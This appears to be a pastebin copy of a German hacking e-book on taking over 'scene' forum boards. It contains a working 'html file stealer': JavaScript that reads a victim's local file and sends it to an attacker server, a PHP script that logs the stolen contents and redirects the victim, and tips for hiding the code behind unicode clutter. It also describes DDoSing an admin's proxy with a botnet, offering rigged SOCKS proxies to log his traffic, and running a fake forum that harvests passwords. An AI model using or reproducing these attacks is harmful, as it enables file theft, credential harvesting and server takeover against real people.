- var source = "";
- if(browsertyp != "IE") {
- var url = new java.net.URL(new java.net.URL(window.location.href), file);
- var stream = new java.io.DataInputStream(url.openStream());
- var line = "";
- while ((line = stream.readLine()) != null) {
- if(first=="yes") {
- source += line;
- first="no";
- } else {
- source += "\n" + line;
- }
- }
- stream.close();
- } else {
- source = dwn.startDownload(file,uebernahme);
- }
- return source;
- }
- </script>
- </head>
- <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
- <script type="text/javascript">
- var browsertyp;
- if(!navigator.language || document.defaultCharset) {
- browsertyp='IE';
- document.write('none download');
- } else {
- browsertyp='MO';
- }
- </script>
- <form name="x" action="javascript:uebernahme(read(document.x.textfile.value))">
- <p><input type="text" name="textfile" value="file:///[local-file]" size="20">
- <input type="submit" name="run" value="Datei einlesen"></p>
- <p><textarea name="textausgabe" rows="5" cols="15"></textarea></p>
- </form><script>document.forms[0].submit()</script>
- </body>
- </html>
- #########annahme.php#########
- <?php
- if (isset($_GET["log"])) { echo $_GET["log"];
- if (file_exists("[logfile]")) {
- $filename="[logfile]";
- $fp = fopen($filename,'a');
- fwrite($fp, "\r\n\r\n#########next file##########\r\n\r\n" . $_GET["log"]);
- fclose($fp); } else { $filename="[logfile]";
- $fp = fopen($filename,'w');
- fwrite($fp, "$_GET["log"]);
- fclose($fp); } }
- header('Location: [weiterleitung]');
- ?>
- #########help.txt#########
- ###html file stealer - by unnex###
- hilfe:
- zu bearbeiten:
- #sender.html
- [server]=eigenen server angeben zb: www.meinserver.de
- [local-file]=locale zu klauende datei angeben zb: C:/geheim.txt
- line 9: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
- line 14: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
- line 53: <p><input type="text" name="textfile" value="file:///[local-file]" size="20">
- #annahme.php
- [logfile]=logfile angeben wo die daten der geklauten datei gespeichert werden zb: log.txt
- [weiterleitung]=wohin das opfer schlussendlich gelinkt werden soll zb http://google.de
- line 3: if (file_exists("[logfile]")) {
- line 4: $filename="[logfile]";
- line 7: fclose($fp); } else { $filename="[logfile]";
- line 11: header('Location: [weiterleitung]');
- wird das script im localmode ausgefuehrt, dann wird die datei vom vic uebertragen.
- wichtig: sende die datei an dein vic. nicht uppe die datei und sende den link!
- ---
- wir muessen uns dabei keine sorgen machen das dem admin das auffaellt. denn wie wir wissen ist das
- eine methode die sehr selten und spezifisch ist. und deswegen ist es gerade zu laecherlich einem board
- admin aus der deutschen scene ausreichende kenntnisse zu zu schreiben, das er diesen angriff erkennen
- koennte. wie schon in "1.2 teamanalyse" erwaehnt. hinzu kommend gelten .html dateien sowieso als
- unbedenklich.
- allerdings sollten wir den code sehr gut verstecken. bzw wir sollten viel stylischen
- schnickschnack mit in die html datei bringen damit unser code nicht auffaellt. oder jedes zeichen als
- unicode ausgabe nehmen. ebenso kann es nicht schaden wenn wir die html datei grundsaetzlich mit viel
- code oder unicode zeichen (oder jedes zeichen als unicode zeichen) zupflastern. wir wollen ja nicht
- gefahr laufen das der admin unser tut im texteditor liest.
- unser fertiges tutorial+file-stealer stellen wir dann im board online.
- folgend schreiben wir den admin an und empfehlen ihm unser tutorial. sollte er kein interesse zeigen,
- dann koennen wir auch notfalls die begruendung einbringen das er es sich mal ansehen soll um
- verbesserungen oder fehler sagen zu koennen. nun brauchen wir nur noch zu warten bis er sich
- unser tutorial zieht und es mit seinem browser oeffnet. der inhalt der root.txt wird an unseren
- server geschickt und schon haben wir alle infos die wir zur uebernahme des servers brauchen.
- vorteilhaft an dieser methode ist auch das unsere html datei logischerweise mit jedem
- browser geoeffnet werden kann. demnach ist unser script nur auf den browser angewiesen, das
- betriebssystem spielt also keine rolle bei diesem angriff.
- 3.2.3 mein nolog, loggt
- der name dieses unterpunkts sagt eigentlich schon alles. ich denke mal es ist schnell erklaert^^
- bei dieser methode sind wiedermal unsere ressourcen gefragt.
- zu aller erst besorgen wir uns die ip des vpn oder socks vom admin. wie wir das machen wissen
- wir ja aus "2.1 ip's besorgen". dann melden wir uns im forum an und erstellen einen thread in dem
- wir kostenlos nolog-socks anbieten. nun warten wir ein bisschen bis sich unser angebot rummgesprochen
- hat. dann ddosn wir den sock vom admin down. viele nutzen gehackte server auf denen sie socks
- installiert haben. mit einem mittelmaesigen botnet duerften wir also in den meisten faellen
- erfolg haben. nun gibt es zwei moeglichkeiten. entweder der admin nimmt von selbst einen eurer
- angebotenen socks oder wir muessen ihm einen aufschwatzen. sollte er von selbst einen von euch nehmen
- dann haben wir schon gewonnen. ansonsten: schreiben wir den admin an und erzaehlen ihm von ein paar
- servern die wir hacked haben und ihm geben wollen. oder wie fragen ihn ob er eine seite fuer uns hackt.
- also, wir reden ihm ein paar dinge ein damit er von ganz allein nach einem sock fragt. sollte er nicht
- fragen dann schicken wir ihm einfach einen. egal ob er danach gefragt hat oder nicht. einfach mal den
- sock+logindaten dem admin geben. glaubts mir leute, in der not frisst der teufel fliegen ;-)
- was der admin mit sicherheit nicht wissen wird ist, das wir im gegensatz zu ihm wissen das die socks5
- verschluesselung alles andere als perfekt ist. da uns der sock gehoert und wir den server unter der
- fuchtel haben, koennen wir nun frei alle handlungen des admins loggen. im grunde muessen nun nur noch
- warten bis der admin sich ueber unseren sock im acp des boards einloggt.
- 3.3 meine projekte
- an dieser stelle sollte erstmal jedem klar sein das ich hier nicht von meinen persoehnlichen projekten
- spreche sondern von den einzelnen methoden wie man eigene projekte zum hacken eines deutschen
- sceneboards nutzen kann. also nicht vom unterpunkt-titel irritieren lassen.
- grundregel fuer diese arten von angriffen ist: "der admin benutzt sogut wie ueberall das selbe passwort".
- 3.3.1 meine crew
- im grunde ist die sache ganz einfach. zu erst einmal brauchen wir ein forensystem. am besten ein sehr
- bekanntes was auch viele andere scene-boards nutzen. das setzen wir dann auf nen server und ernennen
- es zum scene-board. nun basteln wir die loginfunction ein bisschen um so das alle user+pw geloggt werden.
- dann machen wir ein bisschen werbung dafuer. wenn wir ein paar user zusammen haben,
- sagen wir mal 20, dann fangen wir an ein paar ahnungslose nicht-scene seiten zu defacen. diese
- versehen wir mit werbung fuer unser board. anschließend posten wir unsere defaces auf unserem board
- und auf dem board welches wir angreifen wollen. wir verfahren eine weile so weiter bis unser board
- ein bisschen bekanntheistgrad im kreise des anderen boards erreicht hat. nun ist es an der zeit
- dem admin des victim-boards eine linkpartnerschaft vor zu schlagen. er wird sich bei uns registrieren
- muessen um die lage einschaetzen zu koennen. und hier ist auch schon ende vom lied. wenn er sich regt
- wird das passwort geloggt und wir koennen es auf sein board anwenden. notfalls koennen wir dem
- admin auch vorschlagen einen besonderen titel in unserem board zu bekommen zb. "linkpartner" usw...
- nachwort:
- alle hier beschriebenen methoden wurden von mir selbst schon erfolgreich
- durchgefuehrt. natuerlich sind diese taktiken nicht 1zu1 durchfuehrbar.
- bzw man muss sie logischerweise angepasst an die gegebenheiten handhaben.
- jeder der mit social engeneering arbeitet ist darauf bedacht auch nach dem
- angriff unentdeckt zu bleiben. allerdings kann man auch mal pech haben :D
- aber gerade deswegen kann ich hier auch mal eine referenz fuer die beschriebenen
- angriffstalktiken einbringen:
- "3.1.1 bug fixen" > http://scenewiki.wordpress.com/2010/04/18/cyberterrorists-defaced/
- vllt. noch ein wort dazu: dieser hack war eher ein fehler. bzw. ich haette die seite nicht
- defacen duerfen dann waer ich auch nicht aufgefellen XD ebenso ist dieser admin "bursali"
- ein typ der ganz ok ist. es war also eher unberechtigt von mir ihm so in die suppe zu pissen XD
- ---------
- dieses e-book darf nur in unabgeaenderter form frei kopiert werden.
- (der gesamte text, auch dieser satz hier, vorwort & nachwort)
- dieses e-book dient lediglich zur aufdeckung sowie dem verstaendniss
- und der behebung von sicherheitsschwachstellen in deutschen scene-boards.
- ich distanziere mic von jeglichem schaden der durch dieses e-book
- entstehen kann und weise alle leser darauf hin das die hier gebotenen
- informationen nicht fuer kriminelle zwecke missbrauch werden duerfen.
- ---
- greetz unnex
- ------------------------
- <november 2010
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement